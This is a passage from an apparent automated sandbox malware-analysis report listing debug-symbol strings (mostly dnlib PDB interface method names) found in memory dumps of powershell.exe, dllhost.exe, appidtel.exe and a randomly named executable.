              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QEwzeZKCXN.exe, 0000000A.00000002.3409362566.000000000013E000.00000002.00000001.01000000.00000006.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808153383.000000000013E000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: appidtel.pdbGCTL source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dllhost.pdb source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dllhost.pdbGCTL source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
